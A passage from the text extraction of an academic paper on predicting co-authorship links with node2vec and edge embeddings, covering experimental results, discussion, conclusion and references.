coefficient covðx; yÞffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi covðx; xÞ p � ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi covðy; yÞ p Generalized Jaccard P minðxi; yiÞP maxðxi; yiÞ Table 2 Binary operators for computing vectorized (u, v)-edge representation based on node attribute embeddings f(x) for ith component for f(u, v). Symmetry operator Definition Average fiðuÞ þ fiðvÞ 2 Hadamard fi(u) · fi(v) Weighted-L1 jfi(u) - fi(v)j Weighted-L2 (fi(u) - fi(v)) 2 Neighbor Weighted-L1 P w2NðuÞ[fug fiðwÞ jNðuÞj þ 1 � P t2NðvÞ[fvg fiðtÞ jNðvÞj þ 1 �� Neighbor Weighted-L2 P w2NðuÞ[fug fiðwÞ jNðuÞj þ 1 � P t2NðvÞ[fvg fiðtÞ jNðvÞj þ 1 � �2 Makarov et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.172 8/20 http://dx.doi.org/10.7717/peerj-cs.172 https://peerj.com/computer-science/ Overall edge embedding contained several feature spaces described by the following List 1: (1) Edge embedding based on node2vec node embeddings (2) Edge embedding based on node2vec embedding for keywords co-occurrence network (3) Network similarity scores (baselines in Liben-Nowell & Kleinberg (2007)) - Common neighbors - Jaccard’s coefficient - Adamic-Adar score - Preferential attachment - Graph distance (4) Author similarity scores - Cosine similarity - Common neighbors - Jaccard’s generalized coefficient - Pearson’s correlation coefficient - Metric score TRAINING MODEL We consider machine learning models for binary classification task of whether for a given pair of nodes there will be a link connecting them based on previous or current co-authorship network. We compare Logistic Regression with Lasso regularization, Random Forest, Extreme Gradient Boosting (XGBoost), and Support Vector Machine, in short SVM, models. We use most common machine learning frameworks which we shortly describe below. Logistic Lasso Regression is a kind of linear model with a logit target function, in addition, Lasso regularization sets some coefficients to zero, effectively choosing a simpler model that reduces number of coefficients. Random Forest and Gradient Boosting are an ensemble learning methods. The former operates by constructing a multitude of decision trees, the latter combines several weak models building the model in a stage-wise fashion and generalizes them by allowing optimization of an arbitrary differentiable loss function. Random Forest adds additional randomness to the model, while growing the trees. Instead of searching for the most important feature while splitting a node, it searches for the best feature among a random subset of features. SVM constructs a hyperplane that has the largest distance to the nearest training-data point of any class when it achieves a good classification. We use standard classification performance metrics for evaluating quality such as Precision, Accuracy, F1-score (micro, macro), Log-loss, ROC–AUC. Next, we shortly define them. Precision is a measure that tells us what proportion of publications that we diagnosed as existing, actually had existed. Accuracy in classification problems is the number of correct Makarov et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.172 9/20 http://dx.doi.org/10.7717/peerj-cs.172 https://peerj.com/computer-science/ predictions made by the model over all kinds predictions made. Recall is a measure that tells us what proportion of publications that actually had existed was diagnosed by the algorithm as existing. To balance these metrics, F1-score is calculated as a weighted mean of the Precision and Recall. Micro-averaged metrics are usually more useful if the classes distribution is uneven by calculating metrics globally to count true and false predictions, macro-averaged are used when we want to evaluate systems performance across on different classes by calculating metrics for each label. Log-loss, or logarithmic loss, is a “soft” measurement of accuracy that integrates the idea of probabilistic confidence. In binary classification Log-loss can be calculated as � 1N � PN i¼1ðyi � logðpiÞ þ ð1 � yiÞ � logð1 � piÞÞ, where yi is a binary indicator (0 or 1) checking the correctness of classification for observation i, pi is a predicted probability observation i for a given class. Log-loss measures the unpredictability of the “extra noise” that comes from using a predictor as opposed to the true labels. ROC–AUC, aka area under the receiver operating characteristic curve, is equal to the probability that a classifier will rank a randomly chosen existing edge higher than a randomly chosen non-existing one. ROC curves typically feature rate of true predicted existing publications on the Y axis, and rate of false predicted existing publications on the X axis. The larger AUC is usually better. All metrics were averaged using fivefold cross validation with five negative sampling trials for a fixed train set, which we describe below. In our LP problem for the co-authorship network, we have two possible formalizations of predicting links. We consider either temporal network structure using information from the previous years to predict links corresponding the current year or the whole network to predict missing links. For the first task, we use combined HSE+Scopus dataset of 2015 publications and learn to predict papers appearing at 2016 year. We test our model shifting years on 1 year ahead and evaluate our predictions for 2017 year based on publications until 2016 year. For the second task, we remove 50% of existing edges preserving connectivity property from our dataset and add negative sampling of the same size as a number of edges left in order to balance classes for classification problem. In Table 3 for the future links prediction task, we compare chosen predictive models fixing one Neighbor Weighted-L2 link operator to construct edge embeddings considered as model features. It is interesting to see that XGBoost model get significantly overfitted while the best model appear to be Support Vector Machine. In Table 3 and in further tables we highlight the best values of quality metrics in bold. Table 3 Comparing machine learning models based on the Neighbor Weighted-L2 link embedding applied to future links prediction on the Scopus dataset. Precision Accuracy F1-score (macro) F1-score (micro) Log-loss ROC–AUC Logistic regression 0.382 0.372 0.483 0.471 2.089 0.534 Random forest 0.622 0.671 0.652 0.641 0.893 0.725 Gradient boosting 0.487 0.521 0.527 0.582 1.275 0.631 SVM 0.712 0.784 0.761 0.754 0.634 0.816 Makarov et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.172 10/20 http://dx.doi.org/10.7717/peerj-cs.172 https://peerj.com/computer-science/ In what follows, we aim to compare several link embedding metrics (see Table 2) for the best machine learning model. To evaluate our approach for the first task on Scopus dataset, we can see in Table 4 that suggested by authors new link embedding outperforms existing approaches by all the binary classification quality metrics. As for the second task, we evaluate LP task over HSE and Scopus datasets in terms of predictive models and link embeddings. In Tables 5 and 6, we could see that the SVM model outperforms the other model on the HSE dataset but Random Forest gets the best AUC for the Scopus dataset, being competitive with the XGBoost and SVM models (SVM performs slightly better). This could happen due to sparse data in Scopus publications after removing 50% link information and lack of ensemble methods for choosing proper negative sampling for such a sparse dataset. In Tables 7 and 8, we could see that the suggested local proximity operator for link embedding that we call Neighbor Weighted-L2 link embedding outperforms all the other approaches for embedding edges based on node vector representations. To choose the best predictive model and edge embedding operator, we consider several feature space combination based on List 1. The results of their comparison are shown in Table 9 for the first task and in Table 10 for the second task of LP (the original results appear in Makarov et al. (2018b)). Table 4 Comparing link embeddings for future links prediction on the Scopus dataset. Precision Accuracy F1-score (macro) F1-score (micro) Log-loss ROC–AUC Average 0.436 0.578 0.661 0.589 1.341 0.599 Hadamard 0.613 0.654 0.657 0.628 1.125 0.634 Weighted-L1 0.645 0.678 0.674 0.632 0.979 0.723 Weighted-L2 0.672 0.682 0.688 0.637 0.915 0.742 Neighbor Weighted-L1 0.644 0.692 0.701 0.696 0.832 0.783 Neighbor Weighted-L2 0.712 0.784 0.761 0.754 0.634 0.816 Table 5 Comparing machine learning models based on the Neighbor Weighted-L2 link embedding for link prediction problem on the HSE dataset. Precision Accuracy F1-score (macro) F1-score (micro) Log-loss ROC–AUC Logistic regression 0.421 0.462 0.502 0.472 1.873 0.583 Random forest 0.836 0.871 0.774 0.831 0.193 0.888 Gradient boosting 0.771 0.732 0.703 0.734 0.742 0.663 SVM 0.823 0.845 0.782 0.812 0.273 0.828 Table 6 Comparing machine learning models based on the Neighbor Weighted-L2 link embedding for link prediction problem on the Scopus dataset. Precision Accuracy F1-score (macro) F1-score (micro) Log-loss ROC–AUC Logistic regression 0.482 0.491 0.522 0.563 1.452 0.613 Random forest 0.812 0.844 0.745 0.811 0.176 0.876 Gradient boosting 0.852 0.821 0.733 0.806 0.337 0.815 SVM 0.834 0.837 0.701 0.725 0.302 0.818 Makarov et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.172 11/20 http://dx.doi.org/10.7717/peerj-cs.172 https://peerj.com/computer-science/ We could see that adding embedding of author research interests as well as the author embedding itself play significant role in improving prediction quality for both tasks. When considering only structural embedding or node similarity features, we obtained worse results in terms of all binary classification quality metrics. In both tasks, the combined approach with direct node similarity scores does not improve the quality of prediction overfitting the model on particular properties thus influencing the predictions for network with missing links. Makarov et al. (2018a) evaluate their recommender system on including research interests based only on subject categories from the respective journals index in Scopus. It leads to worse results for LP for the authors with small number of research publication, so they succeeded only predicting so-called strong connections for authors writing at least three to five papers in co-authorship. Our approach Table 8 Comparing link embeddings for the link prediction problem on the Scopus dataset. Precision Accuracy F1-score (macro) F1-score (micro) Log-loss ROC–AUC Average 0.588 0.531 0.563 0.569 1.321 0.553 Hadamard 0.672 0.637 0.611 0.632 0.784 0.626 Weighted-L1 0.746 0.653 0.675 0.694 0.693 0.668 Weighted-L2 0.786 0.771 0.705 0.707 0.597 0.774 Neighbor Weighted-L1 0.794 0.821 0.732 0.781 0.337 0.832 Neighbor Weighted-L2 0.812 0.844 0.745 0.811 0.176 0.876 Table 9 Prediction of publications for 2017 year based on ≤2016 years information. Precision Accuracy F1-score (macro) F1-score (micro) Log-loss ROC–AUC (1) 0.712 0.784 0.761 0.754 0.634 0.816 (3) 0.652 0.745 0.731 0.719 0.682 0.767 (1)+(2) 0.735 0.822 0.775 0.759 0.593 0.836 (1)+(3) 0.728 0.796 0.781 0.789 0.618 0.827 (1)+(4) 0.722 0.791 0.772 0.751 0.611 0.819 (3)+(4) 0.683 0.762 0.782 0.781 0.671 0.762 (1)+(2)+(3) 0.742 0.863 0.787 0.751 0.582 0.855 (1)+(2)+(4) 0.738 0.852 0.791 0.731 0.604 0.842 (1)+(2)+(3)+(4) 0.798 0.866 0.793 0.786 0.573 0.878 Table 7 Comparing link embeddings for the link prediction problem on the HSE dataset. Precision Accuracy F1-score (macro) F1-score (micro) Log-loss ROC–AUC Average 0.628 0.611 0.693 0.738 1.092 0.641 Hadamard 0.721 0.728 0.673 0.687 0.703 0.771 Weighted-L1 0.776 0.765 0.727 0.759 0.376 0.817 Weighted-L2 0.786 0.782 0.751 0.782 0.355 0.827 Neighbor Weighted-L1 0.816 0.834 0.762 0.801 0.214 0.839 Neighbor Weighted-L2 0.836 0.871 0.774 0.831 0.193 0.888 Makarov et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.172 12/20 http://dx.doi.org/10.7717/peerj-cs.172 https://peerj.com/computer-science/ allows to work with arbitrary research interest representation thus making it possible to use recommender system for novice researchers with small or zero connections in the network. EXPERIMENTS FOR A LARGE NETWORK To evaluate scalability of our results, we considered the LP task for the large network called AMiner (Tang et al., 2008). This network describes collaborations among the authors and contains 1,560,640 nodes and 4,258,615 edges. For constructing node embeddings we used node2vec with model parameters p, q = (1,1), embedding dimension d = 128, length of walk per node equaled l = 60, and number of walks per node equaled n = 3. We decreased values of l and n in comparison with default values, because our computer terminated process due to memory issues. We studied the impact of train/test split on different edge embeddings operators while fixing Logistic Regression model for LP. We considered train set, consisting of 20%, 40%, 60%, 80% of the graph edges while averaging binary classification quality metrics over five negative sampling providing negative examples for non-existent edges. We compared the Log-loss (Figs. 2A and 2B) and Accuracy (Figs. 2C and 2D) metrics computed for train and test sets using different edge embeddings. As a result, we obtained that Hadamard and Neighbor Weighted-L2 edge embedding operators represent highly accurate results while trained on sparse data from the original graph. Moreover, increasing the size of train data (which is the case for our temporal co-authorship network) The Hadamard product becomes inferior to our Neighbor Weighted-L2 operator. In addition, the Neighbor Weighted-L1 operator also showed greater performance in contrast to the HSE dataset. It was interesting to find out that overall performance of node2vec node embedding model produces very precise results for LP task, which may vary depending on graph as was shown in Grover & Leskovec (2016). DISCUSSION We have obtained that combined approach of embedding co-authorship and keywords co-occurrence networks, while preserving several author attributes leads to significant improvement in the classification quality metrics for predicting future links and LP tasks. However, we will continue to experiment with node2vec model. The (1) feature space Table 10 Link prediction for 2017 year on the Scopus dataset. Precision Accuracy F1-score (macro) F1-score (micro) Log-loss ROC–AUC (1) 0.767 0.831 0.703 0.783 0.236 0.859 (3) 0.731 0.822 0.698 0.778 0.244 0.813 (1)+(2) 0.811 0.843 0.726 0.805 0.216 0.864 (1)+(3) 0.763 0.821 0.703 0.775 0.231 0.839 (1)+(4) 0.772 0.833 0.715 0.794 0.223 0.861 (3)+(4) 0.747 0.824 0.719 0.791 0.241 0.825 (1)+(2)+(3) 0.808 0.835 0.724 0.807 0.193 0.866 (1)+(2)+(4) 0.821 0.842 0.733 0.813 0.203 0.872 (1)+(2)+(3)+(4) 0.812 0.844 0.745 0.811 0.176 0.876 Makarov et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.172 13/20 http://dx.doi.org/10.7717/peerj-cs.172 https://peerj.com/computer-science/ from the List 1 is node2vec model with d = 128 (compared also on d = 128) and parameters p, q = (1,0.25) obtained by us via model fitting on a given d and logistic regression baseline model. The small q value shows that considering local proximity was more important than proximities of highest orders. However, we aim to further study this question taking into account modern methods of graph auto-encoders (Kipf & Welling, 2016). We are further working on a new embedding model called JONNE learning high quality node representations in tandem with edge representations. We proved the embeddings learned by JONNEE is almost always superior then of those learned by state-of-the-art models of all different types: matrix factorization based, sequence-based and deep learning based but the model has a certain drawback of longer training similar to matrix factorizations but less parallelizable, thus giving us the dilemma to choose between quality and processing speed of suggested solution for edge embedding construction. Figure 2 Low log-loss and high accuracy (plotted log-scale Y-axis) represent the best edge embedding. We show that Neighbor Weighted-L1 and Neighbor Weighted-L2 operators are on par with the state-of-art Hadamard product presented in Grover & Leskovec (2016) and outperform it when train data size increases based on Log-loss (A and B) and Accuracy (C and D) metrics computed for train and test sets. Full-size DOI: 10.7717/peerj-cs.172/fig-2 Makarov et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.172 14/20 http://dx.doi.org/10.7717/peerj-cs.172/fig-2 http://dx.doi.org/10.7717/peerj-cs.172 https://peerj.com/computer-science/ While the LP task still remains hard problem for network analysis, its application to matching collaborators based on structural, attribute and content information shows promising results on applicability of graph-based recommender system predicting links in the co-authorship network and incorporating author research interests in collaborative patterns. We aim to generalize the model based on full-text extraction of research interests from collections of source documents and studying deep learning solutions for representing combined embedding of structural and content information for co- authorship networks. The code for computing all the models with respect to classification evaluation, choosing proper edge embedding operator and tuning hyper-parameters of node embeddings will be uploaded on GitHub (http://github.com/makarovia/jcdl2018/) including the HSE and Scopus datasets. CONCLUSION We have improved recommender systems (Makarov, Bulanov & Zhukov, 2017; Makarov et al., 2018a) based on choosing proper link embedding operator (Makarov et al., 2018b) and including research interest information presented as embedding of nodes in keywords co-occurrence network connecting keywords relating to a given research article. We have compared several machine learning models for future and missing LP problems interpreted as a binary classification problem. The edge embedding operator suggested by Makarov et al. (2018b) edge embedding operator called Neighbor Weighted-L2 (see Table 2) outperforms all the other edge embedding functions due to involving the neighborhood of the edge in the graph and was properly evaluated in this paper for both tasks. Among the machine learning models, SVM outperforms all the others except the LP problem on the sparse Scopus dataset while XGBoost was significantly overfitted; however, training SVM for large graphs is computationally hard. Such a constructed model may be considered as a recommender system for searching collaborators based on mutual research interests and publishing patterns. The recommender system demonstrates good results on predicting new collaborations between existing authors even if they have small number of data in co-authorship network due to availability of their research interests. We are looking forward to the evaluation of our system for universities, who have to deal with the problems of finding an expert based on text for evaluation, matchmaking for co-authored research papers with novice researchers, searching for collaborators on specific grant proposal or proper scientific advisers. Focusing only on machine learning task is not suitable for real-world application involving social interactions, so we aim to implement framework with the possibility to manually add positive and negative preferences for collaboration recommendations, thus providing a useful service which could be integrated in university business process of managing researchers’ publication activity. Our system may also be used for predicting the number of publications corresponding to a given administrative staff unit using network collaborative patterns and thus able to evaluate the efficiency of the authors or the whole staff. It also may be used for Makarov et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.172 15/20 http://github.com/makarovia/jcdl2018/ http://dx.doi.org/10.7717/peerj-cs.172 https://peerj.com/computer-science/ suggesting collaborations between separate staff units by considering combined network with staff units as vertices and weighted by the number of publications mutual connections between them. Evaluating such a network for HSE University give us the picture that most popular faculties of Economics and Management have a lot of mutual connections due to many researchers working at these faculties, but limiting these connection only on Scopus publication leads to the influence of Computer Science and Engineering faculties which showed trend of computer science research in applied sciences. We leave for the future work consideration of the applicability of our system which suggests a new university publication strategy based on collaboration patterns and invites researchers to compare the existing solutions on the HSE researchers’ dataset. ACKNOWLEDGEMENTS A part of the article is extended and revised version of presented oral talk at international conference AIST’18 and posters at ACM/IEEE JCDL’18, WebSci’18 and SunBelt’18. We thank all the colleagues from NRU HSE participated in discussion of this research. ADDITIONAL INFORMATION AND DECLARATIONS Funding The work was supported by the Russian Science Foundation under grant 17-11-01294 and performed at the National Research University Higher School of Economics, Russia. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Russian Science Foundation: 17-11-01294. National Research University Higher School of Economics, Russia. Competing Interests The authors declare that they have no competing interests. Author Contributions � Ilya Makarov conceived and designed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � Olga Gerasimova performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, approved the final draft. � Pavel Sulimov performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, approved the final draft. � Leonid E. Zhukov conceived and designed the experiments, analyzed the data, performed the computation work, approved the final draft. Makarov et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.172 16/20 http://dx.doi.org/10.7717/peerj-cs.172 https://peerj.com/computer-science/ Data Availability The following information was supplied regarding data availability: GitHub: https://github.com/MakarovIA/jcdl2018. REFERENCES Abu-El-Haija S, Perozzi B, Al-Rfou R. 2017. Learning edge representations via low-rank asymmetric projections. In: Proceedings of the 2017 ACM on Conference on Information and Knowledge Management. New York: ACM, 1787–1796. Adafre SF, De Rijke M. 2005. Discovering missing links in Wikipedia. In: Proceedings of the 3rd International Workshop on Link Discovery, LinkKDD ’05. New York: ACM, 90–97. Backstrom L, Leskovec J. 2011. Supervised random walks: predicting and recommending links in social networks. In: Proceedings of the Fourth ACM International Conference on Web Search and Data Mining, WSDM ’1. New York: ACM, 635–644. Barabási A-L, Pósfai M. 2016. Network science. Cambridge: Cambridge University Press. Belkin M, Niyogi P. 2002. Laplacian eigenmaps and spectral techniques for embedding and clustering. Advances in Neural Information Processing Systems. Cambridge: MIT Press, 585–591. Cai H, Zheng VW, Chang K. 2018. A comprehensive survey of graph embedding: problems, techniques and applications. IEEE Transactions on Knowledge and Data Engineering 30(9):1616–1637 DOI 10.1109/tkde.2018.2807452. Cao S, Lu W, Xu Q. 2015. Grarep: learning graph representations with global structural information. In: Proceedings of the 24th ACM International on Conference on Information and Knowledge Management, CIKM ’15, New York: ACM, 891–900. Carstens BT, Jensen MR, Spaniel MF, Hermansen A. 2017. Vertex similarity in graphs using feature learning. Available at https://projekter.aau.dk/projekter/files/259997796/ mi109f17___Vertex_Similarity.pdf (accessed 7 June 2017). Cetorelli N, Peristiani S. 2013. Prestigious stock exchanges: a network analysis of international financial centers. Journal of Banking & Finance 37(5):1543–1551 DOI 10.1016/j.jbankfin.2012.06.011. Chang S, Han W, Tang J, Qi G-J, Aggarwal CC, Huang TS. 2015. Heterogeneous network embedding via deep architectures. In: Proceedings of the 21th ACM SIGKDD International Conference on Knowledge Discovery and Data Mining, KDD ’15, New York: ACM, 119–128. Chen H, Li X, Huang Z. 2005. Link prediction approach to collaborative filtering. In: Proceedings of the 5th ACM/IEEE-CS Joint Conference on Digital Libraries (JCDL ’05), New York, NY, USA, 141–142. Chen H, Perozzi B, Al-Rfou R, Skiena S. 2018. A tutorial on network embeddings. arXiv preprint arXiv:1808.02590. Cho H, Yu Y. 2018. Link prediction for interdisciplinary collaboration via co-authorship network. Social Network Analysis and Mining 8(1):25 DOI 10.1007/s13278-018-0501-6. Cui P, Wang X, Pei J, Zhu W. 2018. A survey on network embedding. IEEE Transactions on Knowledge and Data Engineering, 21 pages. Available at https://ieeexplore.ieee.org/abstract/ document/8392745. Elsevier. 2018. Scopus. Available at http://www.scopus.com/ (accessed 9 January 2018). Gao F, Musial K, Cooper C, Tsoka S. 2015. Link prediction methods and their accuracy for different social networks and network metrics. Scientific Programming 2015:1–13 DOI 10.1155/2015/172879. Makarov et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.172 17/20 https://github.com/MakarovIA/jcdl2018 http://dx.doi.org/10.1109/tkde.2018.2807452 https://projekter.aau.dk/projekter/files/259997796/mi109f17___Vertex_Similarity.pdf https://projekter.aau.dk/projekter/files/259997796/mi109f17___Vertex_Similarity.pdf http://dx.doi.org/10.1016/j.jbankfin.2012.06.011 http://dx.doi.org/10.1007/s13278-018-0501-6 https://ieeexplore.ieee.org/abstract/document/8392745 https://ieeexplore.ieee.org/abstract/document/8392745 http://www.scopus.com/ http://dx.doi.org/10.1155/2015/172879 http://dx.doi.org/10.7717/peerj-cs.172 https://peerj.com/computer-science/ Gao S, Denoyer L, Gallinari P. 2011. Temporal link prediction by integrating content and structure information. In: Proceedings of the 20th ACM International Conference on Information and Knowledge Management, CIKM ’11, New York: ACM, 1169–1174. Goyal P, Ferrara E. 2018. Graph embedding techniques, applications, and performance: a survey. Knowledge-Based Systems 151:78–94 DOI 10.1016/j.knosys.2018.03.022. Goyal P, Hosseinmardi H, Ferrara E, Galstyan A. 2018. Capturing edge attributes via network embedding. arXiv preprint arXiv:1805.03280. Grover A, Leskovec J. 2016. Node2vec: scalable feature learning for networks. In: Proceedings of the 22Nd ACM SIGKDD International Conference on Knowledge Discovery and Data Mining, KDD ’16, New York: ACM, 855–864. Hasan MA, Zaki MJ. 2011. A survey of link prediction in social networks. Boston: Springer, 243–275. He Q, Pei J, Kifer D, Mitra P, Giles L. 2010. Context-aware citation recommendation. In: Proceedings of the 19th International Conference on World Wide Web, WWW ’10, New York: ACM, 421–430. Huang X, Li J, Hu X. 2017. Label informed attributed network embedding. In: Proceedings of the Tenth ACM International Conference on Web Search and Data Mining, WSDM ’17, New York: ACM, 731–739. Kipf TN, Welling M. 2016. Variational graph auto-encoders. arXiv preprint arXiv:1611.07308. Kong X, Mao M, Wang W, Liu J, Xu B. 2018. Voprec: vector representation learning of papers with text information and structural identity for recommendation. Epub ahead of print 26 April 2018. IEEE Transactions on Emerging Topics in Computing DOI 10.1109/tetc.2018.2830698. Kossinets G, Watts DJ. 2009. Origins of homophily in an evolving social network. American Journal of Sociology 115(2):405–450 DOI 10.1086/599247. Le Q, Mikolov T. 2014. Distributed representations of sentences and documents. In: Proceedings of the 31st International Conference on Machine Learning (ICML-14), Cambridge: MIT Press, 1188–1196. Li X, Chen H. 2009. Recommendation as link prediction: a graph kernel-based machine learning approach. In: Proceedings of the 9th ACM/IEEE-CS Joint Conference on Digital Libraries, JCDL ’09. New York: ACM, 213–216. Liang Y, Li Q, Qian T. 2011. Finding relevant papers based on citation relations. In: International Conference on Web-Age Information Management, Berlin: Springer, 403–414. Liao L, He X, Zhang H, Chua T-S. 2017. Attributed social network embedding. arXiv preprint arXiv:1705.04969. Liben-Nowell D, Kleinberg J. 2007. The link-prediction problem for social networks. Journal of the Association for Information Science and Technology 58(7):1019–1031. Liu Y, Kou Z. 2007. Predicting who rated what in large-scale datasets. ACM SIGKDD Explorations Newsletter 9(2):62–65 DOI 10.1145/1345448.1345462. Lü L, Zhou T. 2011. Link prediction in complex networks: a survey. Physica A: Statistical Mechanics and its Applications 390(6):1150–1170. Makarov I, Bulanov O, Gerasimova O, Meshcheryakova N, Karpov I, Zhukov LE. 2018a. Scientific matchmaker: collaborator recommender system. In: Analysis of Images, Social Networks and Texts, Cham: Springer International Publishing, 404–410. Makarov I, Bulanov O, Zhukov L. 2017. Co-author recommender system. In: Springer Proceedings in Mathematics and Statistic, Berlin: Springer, 1–6. Makarov I, Gerasimova O, Sulimov P, Korovina K, Zhukov L. 2019a. Joint node-edge network embedding for link prediction. In: Springer Proceedings in Mathematics and Statistic (to appear), Berlin: Springer, 1–12. Makarov et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.172 18/20 http://dx.doi.org/10.1016/j.knosys.2018.03.022 http://dx.doi.org/10.1109/tetc.2018.2830698 http://dx.doi.org/10.1086/599247 http://dx.doi.org/10.1145/1345448.1345462 http://dx.doi.org/10.7717/peerj-cs.172 https://peerj.com/computer-science/ Makarov I, Gerasimova O, Sulimov P, Zhukov L. 2019b. Co-authorship network embedding and recommending collaborators via network embedding. In: Springer Proceedings in Mathematics and Statistic (to appear), Berlin: Springer, 1–6. Makarov I, Gerasimova O, Sulimov P, Zhukov LE. 2018b. Recommending co-authorship via network embeddings and feature engineering: the case of national research university higher school of economics. In: Proceedings of the 18th ACM/IEEE on Joint Conference on Digital Libraries. New York: ACM, 365–366. McPherson M, Smith-Lovin L, Cook JM. 2001. Birds of a feather: homophily in social networks. Annual Review of Sociology 27(1):415–444 DOI 10.1146/annurev.soc.27.1.415. Mikolov T, Sutskever I, Chen K, Corrado GS, Dean J. 2013. Distributed representations of words and phrases and their compositionality. In: Advances in Neural Information Processing Systems, 3111–3119. Available at https://papers.nips.cc/paper/5021-distributed-representations-of-words-and- phrases-and-their-compositionality.pdf. Morel CM, Serruya SJ, Penna GO, Guimarães R. 2009. Co-authorship network analysis: a powerful tool for strategic planning of research, development and capacity building programs on neglected diseases. PLOS Neglected Tropical Diseases 3(8):e501 DOI 10.1371/journal.pntd.0000501. National Research University Higher School of Economics. 2017. Publications of HSE. Available at http://publications.hse.ru/en (accessed 9 May 2017). Newman MEJ. 2004a. Coauthorship networks and patterns of scientific collaboration. Proceedings of the National Academy of Sciences of the United States of America 101(suppl 1):5200–5205 DOI 10.1073/pnas.0307545100. Newman ME. 2004b. Who is the best connected scientist? a study of scientific coauthorship networks. Complex Networks 1:337–370. Pan S, Wu J, Zhu X, Zhang C, Wang Y. 2016. Tri-party deep network representation. Network 11(9):12. Perozzi B, Al-Rfou R, Skiena S. 2014. Deepwalk: online learning of social representations. In: Proceedings of the 20th ACM SIGKDD International Conference on Knowledge Discovery and Data Mining, KDD ’14, New York: ACM, 701–710. Robins G, Snijders T, Wang P, Handcock M, Pattison P. 2007. Recent developments in exponential random graph (p�) models for social networks. Social Networks 29(2):192–215 DOI 10.1016/j.socnet.2006.08.003. Roweis ST, Saul LK. 2000. Nonlinear dimensionality reduction by locally linear embedding. Science 290(5500):2323–2326 DOI 10.1126/science.290.5500.2323. Scott J. 2017. Social network analysis. Thousand Oaks: Sage. Srinivas V, Mitra P. 2016. Applications of link prediction. Cham: Springer International Publishing, 57–61. Tang J, Liu H. 2012. Unsupervised feature selection for linked social media data. In: Proceedings of the 18th ACM SIGKDD International Conference on Knowledge Discovery and Data Mining, KDD ’12. New York: ACM, 904–912. Tang J, Qu M, Wang M, Zhang M, Yan J, Mei Q. 2015. Line: large-scale information network embedding. In: Proceedings of the 24th International Conference on World Wide Web, WWW ‘15, Republic and Canton of Geneva, Switzerland: International World Wide Web Conferences Steering Committee, 1067–1077. Tang J, Zhang J, Yao L, Li J, Zhang L, Su Z. 2008. Arnetminer: extraction and mining of academic social networks. In: KDD’08, New York, NY, USA, 990–998. Makarov et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.172 19/20 http://dx.doi.org/10.1146/annurev.soc.27.1.415 https://papers.nips.cc/paper/5021-distributed-representations-of-words-and-phrases-and-their-compositionality.pdf https://papers.nips.cc/paper/5021-distributed-representations-of-words-and-phrases-and-their-compositionality.pdf http://dx.doi.org/10.1371/journal.pntd.0000501 http://publications.hse.ru/en http://dx.doi.org/10.1073/pnas.0307545100 http://dx.doi.org/10.1016/j.socnet.2006.08.003 http://dx.doi.org/10.1126/science.290.5500.2323 http://dx.doi.org/10.7717/peerj-cs.172 https://peerj.com/computer-science/ Tang L, Liu H. 2011. Leveraging social media networks for classification. Data Mining and Knowledge Discovery 23(3):447–478 DOI 10.1007/s10618-010-0210-x. Tenenbaum JB, De Silva, Langford JC. 2000. A global geometric framework for nonlinear dimensionality reduction. Science 290(5500):2319–2323 DOI 10.1126/science.290.5500.2319. Velden T, Lagoze C. 2009. Patterns of collaboration in co-authorship networks in chemistry-mesoscopic analysis and interpretation. In: 12th International Conference on Scientometrics and Informetrics, Rio de Janeiro: ISSI Society, 1–12. Vorontsov K, Frei O, Apishev M, Romov P, Dudarenko M. 2016. Bigartm. v0.8.2. Available at https://doi.org/10.5281/zenodo.288960. Wang D, Cui P, Zhu W. 2016. Structural deep network embedding. In: Proceedings of the 22nd ACM SIGKDD International Conference on Knowledge Discovery and Data Mining, KDD ’16. New York: ACM, 1225–1234. Wang P, Xu B, Wu Y, Zhou X. 2015. Link prediction in social networks: the state-of-the-art. Science China Information Sciences 58(1):1–38 DOI 10.1007/s11432-014-5237-y. Wasserman S, Faust K. 1994. Social network analysis: methods and applications. Vol. 8. Cambridge: Cambridge University Press. Wu H, Lerman K. 2017. Network vector: distributed representations of networks with global context. arXiv preprint arXiv:1709.02448. Yan E, Ding Y. 2009. Applying centrality measures to impact analysis: a coauthorship network analysis. Journal of the American Society for Information Science and Technology 60(10):2107–2118 DOI 10.1002/asi.21128. Yan S, Xu D, Zhang B, Zhang HJ, Yang Q, Lin S. 2007. Graph embedding and extensions: a general framework for dimensionality reduction. IEEE Transactions on Pattern Analysis and Machine Intelligence 29(1):40–51 DOI 10.1109/tpami.2007.250598. Yang C, Liu Z, Zhao D, Sun M, Chang EY. 2015. Network representation learning with rich text information. In: Proceedings of the 24th International Joint Conference on Artificial Intelligence, Palo Alto, CA, USA, 2111–2117. Makarov et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.172 20/20 http://dx.doi.org/10.1007/s10618-010-0210-x http://dx.doi.org/10.1126/science.290.5500.2319 https://doi.org/10.5281/zenodo.288960 http://dx.doi.org/10.1007/s11432-014-5237-y http://dx.doi.org/10.1002/asi.21128 http://dx.doi.org/10.1109/tpami.2007.250598 http://dx.doi.org/10.7717/peerj-cs.172 https://peerj.com/computer-science/ Dual network embedding for representing research interests in the link prediction problem on co-authorship networks Introduction Related Work Dataset Description and Preprocessing Feature Engineering Link Embeddings Training Model Experiments for a Large Network Discussion Conclusion flink10 References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) 